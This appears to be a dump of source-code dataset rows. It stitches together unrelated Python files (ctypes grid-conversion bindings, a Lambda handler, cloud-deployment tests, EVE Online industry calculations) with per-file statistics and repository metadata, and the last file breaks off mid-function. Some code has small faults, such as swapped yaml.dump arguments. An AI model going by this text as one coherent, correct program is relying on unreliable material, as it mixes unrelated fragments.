# void
# change_grid_space_fv_dg(
# const int nelems,
# const int nx, const int ny, const int nz ,const double *xs, double *fss,
# const int Nx, const int Ny, const int Nz ,const double *Xs, double *Fss,
# const int *fvs);
lib.change_grid_space_fv_dg.argtypes = [
t_int,
t_int, t_int, t_int, t_ndouble, t_ndouble,
t_int, t_int, t_int, t_ndouble, t_ndouble,
t_nint
]
def change_grid_space_fv_dg(fs,xs,Xs,FV):
Fs = np.empty([len(fs), len(Xs), len(Xs), len(Xs)])
xsptr = np.require(xs, dtype=np.double, requirements=['C','A'])
Xsptr = np.require(Xs, dtype=np.double, requirements=['C','A'])
fsptr = np.require(fs, dtype=np.double, requirements=['C','A'])
Fsptr = np.require(Fs, dtype=np.double, requirements=['C','A','W'])
FVptr = np.require(FV, dtype=np.int32, requirements=['C','A'])
lib.change_grid_space_fv_dg(
len(fs),
len(xs), len(xs), len(xs), xsptr, fsptr,
len(Xs), len(Xs), len(Xs), Xsptr, Fsptr,
FVptr
)
return Fsptr.reshape(Fs.shape)
# =========================================================================== #
# deprecated ...
# void
# flash_to_flexi_RG(
# const int xslen, const double *xs, const double *fss,
# const int Xslen, const double *Xs, double *Fss,
# const int oflen, const int *offsets
# );
# flash_to_flexi_RG(
# const int xslen, const double *xs,
# const int Nx, const int Ny, const int Nz, const double *fss,
# const int Xslen, const double *Xs, double *Fss,
# const int oflen, const int *offsets
# )
lib.box_to_flexi.argtypes = [
ct.c_int, ndpointer(ct.c_double, flags="C_CONTIGUOUS"),
ct.c_int, ct.c_int, ct.c_int, ndpointer(ct.c_double, flags="C_CONTIGUOUS"),
ct.c_int, ndpointer(ct.c_double, flags="C_CONTIGUOUS"), ndpointer(ct.c_double, flags="C_CONTIGUOUS"),
ct.c_int, ndpointer(ct.c_int, flags="C_CONTIGUOUS")
]
def box_to_flexi(xs, Xs, box, flx):
shape = box.shape
# ll ... lower left
# tr ... top right
lls, trs = flx.mesh.get_cell_coords()
Is,Js,Ks = tuple(np.round((flx.Nout) * lls / flx.mesh.cellsize).astype(int).T)
offsets = ((Is * shape[1]) + Js) * shape[2] + Ks
offsets = np.require(offsets.ravel(), dtype=np.int32, requirements=['C', 'A'])
xs = np.require(xs.ravel(), dtype=np.double, requirements=['C', 'A'])
Xs = np.require(Xs.ravel(), dtype=np.double, requirements=['C', 'A'])
box = np.require(box.ravel(), dtype=np.double, requirements=['C', 'A'])
flxdata = np.empty(len(offsets) * len(Xs)**3, dtype=np.double)
flxdata = np.require(flxdata.ravel(), dtype=np.double, requirements=['C', 'A', 'W'])
lib.box_to_flexi(
len(xs), xs,
shape[0], shape[1], shape[2], box,
len(Xs), Xs, flxdata,
len(offsets), offsets)
return flxdata.reshape(len(offsets),*[len(Xs)]*3)
# =========================================================================== #
# void
# box_to_flexi_with_averaged_boundaries(
# const int xslen, const double *xs,
# const int Nx, const int Ny, const int Nz, const double *fss,
# const int Xslen, const double *Xs, double *Fss,
# const int oflen, const int *offsets
# )
# lib.box_to_flexi_with_averaged_boundaries.argtypes = [
# ct.c_int, ndpointer(ct.c_double, flags="C_CONTIGUOUS"),
# ct.c_int, ct.c_int, ct.c_int, ndpointer(ct.c_double, flags="C_CONTIGUOUS"),
# ct.c_int, ndpointer(ct.c_double, flags="C_CONTIGUOUS"), ndpointer(ct.c_double, flags="C_CONTIGUOUS"),
# ct.c_int, ndpointer(ct.c_int, flags="C_CONTIGUOUS")
# ]
def box_to_flexi_with_averaged_boundaries(xs, Xs, box, flx):
shape = box.shape
# ll ... lower left
# tr ... top right
lls, trs = flx.mesh.get_cell_coords()
Is,Js,Ks = tuple(np.round((flx.Nout) * lls / flx.mesh.cellsize).astype(int).T)
offsets = ((Is * shape[1]) + Js) * shape[2] + Ks
offsets = np.require(offsets.ravel(), dtype=np.int32, requirements=['C', 'A'])
xs = np.require(xs.ravel(), dtype=np.double, requirements=['C', 'A'])
Xs = np.require(Xs.ravel(), dtype=np.double, requirements=['C', 'A'])
box = np.require(box.ravel(), dtype=np.double, requirements=['C', 'A'])
flxdata = np.empty(len(offsets) * len(Xs)**3, dtype=np.double)
flxdata = np.require(flxdata.ravel(), dtype=np.double, requirements=['C', 'A', 'W'])
lib.box_to_flexi_with_averaged_boundaries(
len(xs), xs,
shape[0], shape[1], shape[2], box,
len(Xs), Xs, flxdata,
len(offsets), offsets)
return flxdata.reshape(len(offsets),*[len(Xs)]*3)
# =========================================================================== #
# void
# flexi_to_box(
# const int xslen, const double *xs,
# const int Xslen, const double *Xs,
# const int nelems, const int *offsets, double *flexi
# const int Nx, const int Ny, const int Nz, const double *box,
# );
lib.flexi_to_box.argtypes = [
ct.c_int, ndpointer(ct.c_double, flags="C_CONTIGUOUS"),
ct.c_int, ndpointer(ct.c_double, flags="C_CONTIGUOUS"),
ct.c_int, ndpointer(ct.c_int, flags="C_CONTIGUOUS"), ndpointer(ct.c_double, flags="C_CONTIGUOUS"),
ct.c_int, ct.c_int, ct.c_int, ndpointer(ct.c_double, flags="C_CONTIGUOUS")
]
def flexi_to_box(xs, Xs, flxdata, flx):
shape = tuple(len(Xs) * flx.mesh.gridsize.astype(np.int))
# ll ... lower left
# tr ... top right
lls, trs = flx.mesh.get_cell_coords()
Is,Js,Ks = tuple(np.round(sh*ll) for sh,ll in zip(shape,lls.T))
offsets = ((Is * shape[1]) + Js) * shape[2] + Ks
offsets = np.require(offsets.ravel(), dtype=np.int32, requirements=['C', 'A'])
xs = np.require(xs.ravel(), dtype=np.double, requirements=['C', 'A'])
Xs = np.require(Xs.ravel(), dtype=np.double, requirements=['C', 'A'])
flxdata = flxdata.transpose(0,3,2,1)
flxdata = np.require(flxdata.ravel(), dtype=np.double, requirements=['C', 'A'])
box = np.zeros(shape,dtype=np.double)
box = np.require(box.ravel(), dtype=np.double, requirements=['C', 'A', 'W'])
lib.flexi_to_box(
len(xs), xs,
len(Xs), Xs,
len(offsets), offsets, flxdata,
shape[0], shape[1], shape[2], box)
return box.reshape(shape)
# =========================================================================== #
# void
# blocks_to_box(
# const int rlevel, const int nblocks,
# const int *rlevels, const double *coords, const double *domain,
# const int nx, const int ny, const int nz, const double *blocks,
# const int Nx, const int Ny, const int Nz, const double *box,
# );
lib.blocks_to_box.argtypes = [
ct.c_int, ct.c_int,
ndpointer(ct.c_int, flags="C_CONTIGUOUS"),
ndpointer(ct.c_double, flags="C_CONTIGUOUS"),
ndpointer(ct.c_double, flags="C_CONTIGUOUS"),
ct.c_int, ct.c_int, ct.c_int, ndpointer(ct.c_double, flags="C_CONTIGUOUS"),
ct.c_int, ct.c_int, ct.c_int, ndpointer(ct.c_double, flags="C_CONTIGUOUS"),
]
def blocks_to_box(rlevel, rlevels, coords, domain, blocks, box):
_rlevels = np.require(np.ravel(rlevels), dtype=np.int32, requirements=['C', 'A'])
_coords = np.require(np.ravel( coords), dtype=np.double, requirements=['C', 'A'])
_domain = np.require(np.ravel( domain), dtype=np.double, requirements=['C', 'A'])
_blocks = np.require(np.ravel( blocks), dtype=np.double, requirements=['C', 'A'])
_box = np.require(np.ravel( box), dtype=np.double, requirements=['C', 'A'])
lib.blocks_to_box(
rlevel, len(_rlevels), _rlevels, _coords, _domain,
blocks.shape[1], blocks.shape[2], blocks.shape[3], _blocks,
box.shape[0], box.shape[1], box.shape[2], _box)
return _box.reshape(box.shape)
# =========================================================================== #
# =========================================================================== #
# =========================================================================== #
ptr_int8 = ndpointer(ct.c_int8, flags="C_CONTIGUOUS")
ptr_int32 = ndpointer(ct.c_int32, flags="C_CONTIGUOUS")
ptr_double = ndpointer(ct.c_double, flags="C_CONTIGUOUS")
def carray(ndarray, dtype=None):
return np.require(ndarray, dtype=dtype, requirements=['C','A'])
lib.morton_to_coords.argtypes = (
ptr_int32, ptr_int8,
ptr_int32, ptr_int32,
ptr_int32, ptr_double,
)
def morton_to_coords(levels, morton):
coords = np.zeros((levels.shape[0],3))
lib.morton_to_coords(
carray(levels.shape, dtype=np.int32), carray(levels),
carray(morton.shape, dtype=np.int32), carray(morton),
carray(coords.shape, dtype=np.int32), carray(coords),
)
return coords
lib.cells_to_image.argtypes = (
ptr_int32, ptr_int8,
ptr_int32, ptr_int32,
ptr_int32, ptr_double,
ptr_int32, ptr_double,
ct.c_int32
)
def cells_to_image(levels, morton, cells, image, method='nearest', gridlines=0):
methods = dict(
nearest = 0,
bilinear = 1,
bicosine = 2,
)
if len(cells.shape) < 2:
cshape = (cells.shape[0], 1,1)
lib.cells_to_image(
carray(levels.shape, dtype=np.int32), carray(levels),
carray(morton.shape, dtype=np.int32), carray(morton),
carray( cshape, dtype=np.int32), carray(cells),
carray( image.shape, dtype=np.int32), carray(image),
methods[str.lower(method)], gridlines
)
else:
lib.cells_to_image(
carray(levels.shape, dtype=np.int32), carray(levels),
carray(morton.shape, dtype=np.int32), carray(morton),
carray( cells.shape, dtype=np.int32), carray(cells),
carray( image.shape, dtype=np.int32), carray(image),
methods[str.lower(method)], gridlines
)
lib.cells_to_image_3d.argtypes = (
ptr_int32, ptr_int8,
ptr_int32, ptr_int32,
ptr_int32, ptr_double,
ptr_int32, ptr_double,
)
def cells_to_image_3d(levels, morton, cells, image):
if len(cells.shape) < 2:
cshape = (cells.shape[0], 1,1,1)
lib.cells_to_image_3d(
carray(levels.shape, dtype=np.int32), carray(levels),
carray(morton.shape, dtype=np.int32), carray(morton),
carray( cshape, dtype=np.int32), carray(cells),
carray( image.shape, dtype=np.int32), carray(image)
)
else:
lib.cells_to_image_3d(
carray(levels.shape, dtype=np.int32), carray(levels),
carray(morton.shape, dtype=np.int32), carray(morton),
carray( cells.shape, dtype=np.int32), carray(cells),
carray( image.shape, dtype=np.int32), carray(image)
)
lib.cells_to_image.argtypes = (
ptr_int32, ptr_int8,
ptr_int32, ptr_int32,
ptr_int32, ptr_double,
ptr_int32, ptr_double,
ct.c_int32
)
# =========================================================================== #
lib.cells_to_image_flash_ug_2d.argtypes = (
ptr_int32, ptr_double,
ptr_int32, ptr_double,
ptr_int32, ptr_double,
ptr_int32, ptr_double,
ct.c_int32,
)
def cells_to_image_flash_ug_2d(coords, bsizes, blocks, image, method='nearest'):
methods = dict(
nearest = 0,
bilinear = 1,
bicosine = 2,
)
lib.cells_to_image_flash_ug_2d(
carray(coords.shape, dtype=np.int32), carray(coords),
carray(bsizes.shape, dtype=np.int32), carray(bsizes),
carray(blocks.shape, dtype=np.int32), carray(blocks),
carray( image.shape, dtype=np.int32), carray(image),
methods[str.lower(method)]
)
# =========================================================================== #
lib.cells_to_image_titanic_patch_2d.argtypes = (
ptr_int32, ptr_double,
ptr_int32, ptr_double,
ct.c_int32,
)
def cells_to_image_titanic_patch_2d(blocks, image, method='nearest'):
methods = dict(
nearest = 0,
bilinear = 1,
)
lib.cells_to_image_titanic_patch_2d(
carray(blocks.shape, dtype=np.int32), carray(blocks),
carray( image.shape, dtype=np.int32), carray(image),
methods[str.lower(method)]
)
| 37.774238 | 185 | 0.549078 | 3,553 | 27,273 | 4.059949 | 0.053194 | 0.049012 | 0.068908 | 0.107452 | 0.870849 | 0.854627 | 0.82669 | 0.792721 | 0.776568 | 0.765962 | 0 | 0.014008 | 0.246178 | 27,273 | 721 | 186 | 37.82663 | 0.687631 | 0.194331 | 0 | 0.563927 | 0 | 0 | 0.027997 | 0.000962 | 0 | 0 | 0 | 0 | 0 | 1 | 0.061644 | false | 0 | 0.011416 | 0.004566 | 0.125571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6dcacbddc584fb8414839b632af68ffb6076db37 | 116 | py | Python | test/api_deployment/lambda.py | vistaprint/TerraformModules | c5f21543102b1a057b8d403ce14fe3e06fb29a21 | [
"Apache-2.0"
] | 7 | 2017-09-18T21:52:31.000Z | 2020-03-04T09:43:31.000Z | test/api_deployment/lambda.py | vistaprint/TerraformModules | c5f21543102b1a057b8d403ce14fe3e06fb29a21 | [
"Apache-2.0"
] | 5 | 2017-09-06T12:16:55.000Z | 2018-01-08T14:15:10.000Z | test/api_deployment/lambda.py | vistaprint/TerraformModules | c5f21543102b1a057b8d403ce14fe3e06fb29a21 | [
"Apache-2.0"
] | null | null | null | from datetime import datetime
def handler(event, context):
return {'Result': datetime.now().isoformat()}
| 19.333333 | 50 | 0.689655 | 13 | 116 | 6.153846 | 0.846154 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.181034 | 116 | 5 | 51 | 23.2 | 0.842105 | 0 | 0 | 0 | 0 | 0 | 0.054054 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
09c6478ea05df65df70785696ffd06a4874c9626 | 79 | py | Python | tools/image.py | Dentosal/rust_os | ddfbefabf4e928859b57fd2dc44fa6e38545f6d5 | [
"MIT"
] | 28 | 2017-02-24T17:51:42.000Z | 2022-03-26T21:32:47.000Z | tools/image.py | Dentosal/rust_os | ddfbefabf4e928859b57fd2dc44fa6e38545f6d5 | [
"MIT"
] | 1 | 2020-04-12T20:23:19.000Z | 2022-01-06T20:25:32.000Z | tools/image.py | Dentosal/rust_os | ddfbefabf4e928859b57fd2dc44fa6e38545f6d5 | [
"MIT"
] | 4 | 2019-01-13T12:37:22.000Z | 2022-01-18T00:14:21.000Z | import os
os.system("open /Users/Hannes/VirtualBox\ VMs/RustOS/Logs/VBox.png")
| 26.333333 | 68 | 0.772152 | 13 | 79 | 4.692308 | 0.923077 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.063291 | 79 | 2 | 69 | 39.5 | 0.824324 | 0 | 0 | 0 | 0 | 0 | 0.696203 | 0.620253 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
61dccf3732139430e79a9b1e970d1a0b6770d804 | 326 | py | Python | src/iris/role_lookup/__init__.py | houqp/iris | 56a39a11dca778d5dfb32e8ba7149011f97729d6 | [
"BSD-2-Clause"
] | null | null | null | src/iris/role_lookup/__init__.py | houqp/iris | 56a39a11dca778d5dfb32e8ba7149011f97729d6 | [
"BSD-2-Clause"
] | null | null | null | src/iris/role_lookup/__init__.py | houqp/iris | 56a39a11dca778d5dfb32e8ba7149011f97729d6 | [
"BSD-2-Clause"
] | null | null | null | # Copyright (c) LinkedIn Corporation. All rights reserved. Licensed under the BSD-2 Clause license.
# See LICENSE in the project root for license information.
from iris.custom_import import import_custom_module
def get_role_lookup(config):
return import_custom_module('iris.role_lookup', config['role_lookup'])(config)
| 36.222222 | 99 | 0.800613 | 47 | 326 | 5.361702 | 0.659574 | 0.119048 | 0.190476 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003497 | 0.122699 | 326 | 8 | 100 | 40.75 | 0.877622 | 0.472393 | 0 | 0 | 0 | 0 | 0.159763 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.666667 | 0.333333 | 1.333333 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
61efe9165294aae44564dc0d6256e2692a0c9c4c | 78 | py | Python | obsscenetransporter/__init__.py | stblassitude/obs-scene-transporter | 76b5cdf52a787eb0dfa816ebafce58f461172662 | [
"MIT"
] | 5 | 2021-04-09T15:28:39.000Z | 2022-03-04T00:22:32.000Z | obsscenetransporter/__init__.py | stblassitude/obs-scene-transporter | 76b5cdf52a787eb0dfa816ebafce58f461172662 | [
"MIT"
] | 4 | 2021-04-10T11:02:39.000Z | 2021-12-23T20:50:26.000Z | obsscenetransporter/__init__.py | stblassitude/obs-scene-transporter | 76b5cdf52a787eb0dfa816ebafce58f461172662 | [
"MIT"
] | null | null | null | from obsscenetransporter.scenecollection import ObsStudioSceneCollection, main | 78 | 78 | 0.923077 | 6 | 78 | 12 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.051282 | 78 | 1 | 78 | 78 | 0.972973 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
61fe7250fd10b3f7bf66e2a25a31edfd9825a78e | 331 | py | Python | tests/formatters/test__humanize_date.py | LCBRU/lbrc_flask | f5f6c3f3832a9040e941c6398b7f150e567d4762 | [
"MIT"
] | null | null | null | tests/formatters/test__humanize_date.py | LCBRU/lbrc_flask | f5f6c3f3832a9040e941c6398b7f150e567d4762 | [
"MIT"
] | null | null | null | tests/formatters/test__humanize_date.py | LCBRU/lbrc_flask | f5f6c3f3832a9040e941c6398b7f150e567d4762 | [
"MIT"
] | null | null | null | from datetime import datetime
from lbrc_flask.formatters import humanize_date
def test__humanize_date__None():
assert humanize_date(None) == ''
def test__humanize_date__Datetime():
assert len(humanize_date(datetime.now())) > 0
def test__humanize_date__Date():
assert len(humanize_date(datetime.now().date())) > 0
| 22.066667 | 56 | 0.761329 | 45 | 331 | 5.155556 | 0.333333 | 0.362069 | 0.193966 | 0.24569 | 0.275862 | 0.275862 | 0 | 0 | 0 | 0 | 0 | 0.006969 | 0.132931 | 331 | 14 | 57 | 23.642857 | 0.801394 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.375 | 1 | 0.375 | true | 0 | 0.25 | 0 | 0.625 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
1104a7b4b786937ec61466003c55417978161db7 | 3,495 | py | Python | tests/test_aws.py | geometry-labs/substrate-infra-archive | e3ecdd2369af2c75f55af32b70d26b68ff35838e | [
"Apache-2.0"
] | null | null | null | tests/test_aws.py | geometry-labs/substrate-infra-archive | e3ecdd2369af2c75f55af32b70d26b68ff35838e | [
"Apache-2.0"
] | null | null | null | tests/test_aws.py | geometry-labs/substrate-infra-archive | e3ecdd2369af2c75f55af32b70d26b68ff35838e | [
"Apache-2.0"
] | null | null | null | from tackle.main import tackle
from tackle.exceptions import HookCallException
import os
from . import get_deployment_action
def test_api_aws_min(change_base_dir, fixture_dir, tmp_move_deployments):
fixture = os.path.join(fixture_dir, 'api-aws-min.yaml')
create = tackle(overwrite_inputs=fixture, no_input=True)
assert create['create_']['deployment_name'] == "polkadot-aws-prod-2"
tackle(overwrite_inputs=get_deployment_action(fixture, 'plan'), no_input=True)
# Module assumes existing network. Can't deploy.
def test_api_aws_network(change_base_dir, fixture_dir, tmp_move_deployments):
fixture = os.path.join(fixture_dir, 'api-aws-network.yaml')
create = tackle(overwrite_inputs=fixture, no_input=True)
assert create['create_']['deployment_name'] == "polkadot-aws-prod-3"
plan = tackle(overwrite_inputs=get_deployment_action(fixture, 'plan'), no_input=True)
import yaml
with open('scratch.yaml', 'w') as f:
yaml.dump(f, plan)
try:
tackle(overwrite_inputs=get_deployment_action(fixture, 'apply'), no_input=True)
tackle(overwrite_inputs=get_deployment_action(fixture, 'destroy'), no_input=True)
except Exception:
tackle(overwrite_inputs=get_deployment_action(fixture, 'destroy'), no_input=True)
raise Exception("Did not apply properly.")
def test_api_aws_k8s(change_base_dir, fixture_dir, tmp_move_deployments):
fixture = os.path.join(fixture_dir, 'api-aws-k8s.yaml')
create = tackle(overwrite_inputs=fixture, no_input=True)
assert create['create_']['deployment_name'] == "polkadot-aws-prod-4"
plan = tackle(overwrite_inputs=get_deployment_action(fixture, 'plan'), no_input=True)
assert plan
try:
tackle(overwrite_inputs=get_deployment_action(fixture, 'apply'), no_input=True)
tackle(overwrite_inputs=get_deployment_action(fixture, 'destroy'), no_input=True)
except Exception:
tackle(overwrite_inputs=get_deployment_action(fixture, 'destroy'), no_input=True)
raise Exception("Did not apply properly.")
def test_validator_aws_min(change_base_dir, fixture_dir, tmp_move_deployments):
fixture = os.path.join(fixture_dir, 'validator-aws-min.yaml')
create = tackle(overwrite_inputs=fixture, no_input=True)
assert create['create_']['deployment_name'] == "polkadot-aws-prod-validator-1"
plan = tackle(overwrite_inputs=get_deployment_action(fixture, 'plan'), no_input=True)
assert plan
# def test_validator_aws_network(change_base_dir, fixture_dir, tmp_move_deployments):
# fixture = os.path.join(fixture_dir, 'validator-aws-network.yaml')
# create = tackle(overwrite_inputs=fixture, no_input=True)
# assert create['create_']['deployment_name'] == "polkadot-aws-prod-validator-2"
# plan = tackle(overwrite_inputs=get_deployment_action(fixture, 'plan'), no_input=True)
# assert plan
#
#
# def test_validator_aws_telemetry(change_base_dir, fixture_dir, tmp_move_deployments):
# fixture = os.path.join(fixture_dir, 'validator-aws-telemetry.yaml')
# create = tackle(overwrite_inputs=fixture, no_input=True)
# assert create['create_']['deployment_name'] == "polkadot-aws-prod-validator-3"
# plan = tackle(overwrite_inputs=get_deployment_action(fixture, 'plan'), no_input=True)
# assert plan
# def test_aws_network2(change_base_dir, fixture_dir):
# plan = tackle(overwrite_inputs=os.path.join(fixture_dir, 'aws-min-plan.yaml'), no_input=True)
# print("plan")
# assert plan
| 47.22973 | 99 | 0.745923 | 472 | 3,495 | 5.235169 | 0.144068 | 0.115338 | 0.161473 | 0.116552 | 0.866856 | 0.849454 | 0.849454 | 0.849454 | 0.849454 | 0.849454 | 0 | 0.002967 | 0.132189 | 3,495 | 73 | 100 | 47.876712 | 0.811738 | 0.298426 | 0 | 0.512195 | 0 | 0 | 0.148438 | 0.02097 | 0 | 0 | 0 | 0 | 0.146341 | 1 | 0.097561 | false | 0 | 0.121951 | 0 | 0.219512 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
fec0f3e5135ab3af51237d9d9d105d3f0c85e034 | 352 | py | Python | terrascript/data/sdm.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 507 | 2017-07-26T02:58:38.000Z | 2022-01-21T12:35:13.000Z | terrascript/data/sdm.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 135 | 2017-07-20T12:01:59.000Z | 2021-10-04T22:25:40.000Z | terrascript/data/sdm.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 81 | 2018-02-20T17:55:28.000Z | 2022-01-31T07:08:40.000Z | # terrascript/data/sdm.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:26:26 UTC)
#
# For imports without namespace, e.g.
#
# >>> import terrascript.data.sdm
#
# instead of
#
# >>> import terrascript.data.strongdm.sdm
#
# This is only available for 'official' and 'partner' providers.
from terrascript.data.strongdm.sdm import *
| 23.466667 | 73 | 0.724432 | 49 | 352 | 5.204082 | 0.693878 | 0.235294 | 0.141176 | 0.203922 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.039867 | 0.144886 | 352 | 14 | 74 | 25.142857 | 0.807309 | 0.801136 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
fed9bef5bc3feffd638144fd0af9e8a2654f31ef | 9,704 | py | Python | eveindustrytools/eveindustrytools.py | SustainedCruelty/eveindustrytools | 45e1f7fcec575cc8d3e5120f03a6eef0966f07b9 | [
"MIT"
] | null | null | null | eveindustrytools/eveindustrytools.py | SustainedCruelty/eveindustrytools | 45e1f7fcec575cc8d3e5120f03a6eef0966f07b9 | [
"MIT"
] | null | null | null | eveindustrytools/eveindustrytools.py | SustainedCruelty/eveindustrytools | 45e1f7fcec575cc8d3e5120f03a6eef0966f07b9 | [
"MIT"
] | null | null | null | import pandas as pd
import evemarkettools as emt
import math
invTypes = emt.fuzz_static_dump()
materials = emt.fuzz_static_dump('https://www.fuzzwork.co.uk/dump/latest/industryActivityMaterials.csv.bz2')
quantities = emt.fuzz_static_dump('https://www.fuzzwork.co.uk/dump/latest/industryActivityProducts.csv.bz2')
# remove all of the test reaction formulas
quantities = pd.merge(quantities, invTypes.loc[invTypes['published'] == 1])[list(quantities.columns)]
probabilities = emt.fuzz_static_dump('https://www.fuzzwork.co.uk/dump/latest/industryActivityProbabilities.csv.bz2')
def input_materials(type_id: int, quantity: int, me: int = 0, prod_type: str = 'manufacturing', prices: bool = False) -> pd.DataFrame:
"""
Calculates the input materials needed for production (manufacturing or reaction). Uses a single production step
Args:
type_id: what item to produce
quantity: how much to produce
me: material efficiency of the blueprints
prod_type: what type of production ('reaction' or 'manufacturing')
prices: whether to calculate prices for the input materials (adds columns price)
Return:
returns a pandas dataframe with the columns 'type_id', 'type_name', 'quantity' ('price' if prices = True)
"""
actID = {'manufacturing': 1, 'reaction': 11}
mats = pd.DataFrame(columns=['type_id', 'type_name', 'quantity'])
if type_id in quantities.loc[(quantities['activityID'] == actID[prod_type]) & (quantities['productTypeID'] == type_id)].values: # item can be manufactured
if prod_type == 'reaction':
bpid = productToFormula(type_id)
elif prod_type == 'manufacturing':
bpid = productToBP(type_id)
else:
raise ValueError("thats not a valid manufacturing type. options are 'reaction', 'manufacturing'")
qPerRun = quantPerRun(bpid)
runs = quantity // qPerRun
if runs > 0:
for _, row in materials.loc[(materials['activityID'] == actID[prod_type]) & (materials['typeID'] == bpid)].iterrows():
if prod_type == 'reaction':
quant = row['quantity'] * runs
elif prod_type == 'manufacturing':
quant = me_formula(row['quantity'],me) * runs
mats = mats.append({'type_id': row['materialTypeID'], 'type_name': emt.typeIDToName(row['materialTypeID']), 'quantity': quant}, ignore_index=True)
# buys the product instead of manufacturing more of it than needed
if int(runs * qPerRun) < int(quantity):
mats = mats.append({'type_id': type_id, 'type_name': emt.typeIDToName(type_id), 'quantity': quantity - (runs * qPerRun)},ignore_index=True)
mats = mats.groupby(['type_id', 'type_name']).sum().reset_index()
mats = mats.astype({"type_id": int, "quantity": int})
if prices:
mats = emt.add_price(mats)
return mats
def vertical_production(type_id: int, quantity: int, me: int = 0, prod_type: str = 'manufacturing' , prices: bool = False) -> pd.DataFrame:
"""
Calculates the input materials needed for vertical manufacturing (producing as much as possible)
Args:
type_id: type_id of the item to produce
quantity: how much of the item to produce
me: material efficiency of the blueprints
prod_type: what type of production ('reaction' or 'manufacturing')
prices: whether to calculate the prices for the input materials (additional column 'price')
Returns:
returns a dataframe with the columns 'type_id', 'type_name', 'quantity', 'price' (if prices is set to true)
"""
actID = {'manufacturing': 1, 'reaction': 11}
mats = pd.DataFrame(columns=['type_id', 'type_name', 'quantity'])
if type_id in quantities.loc[(quantities['activityID'] == actID[prod_type]) & (quantities['productTypeID'] == type_id)].values: # item can be manufactured
if prod_type == 'reaction':
bpid = productToFormula(type_id)
elif prod_type == 'manufacturing':
bpid = productToBP(type_id)
else:
raise ValueError("thats not a valid manufacturing type. options are 'reaction', 'manufacturing'")
qPerRun = quantPerRun(bpid)
runs = quantity // qPerRun
if runs > 0:
for _, row in materials.loc[(materials['activityID'] == actID[prod_type]) & (materials['typeID'] == bpid)].iterrows():
if prod_type == 'reaction':
quant = row['quantity'] * runs
elif prod_type == 'manufacturing':
quant = me_formula(row['quantity'],me) * runs
mats = mats.append(vertical_production(row['materialTypeID'], quant, prod_type = prod_type) ,ignore_index=True)
# buys the product instead of manufacturing more of it than needed
if int(runs * qPerRun) < int(quantity):
mats = mats.append({'type_id': type_id, 'type_name': emt.typeIDToName(type_id), 'quantity': quantity - (runs * qPerRun)},ignore_index=True)
else: # item cannot be manufactured
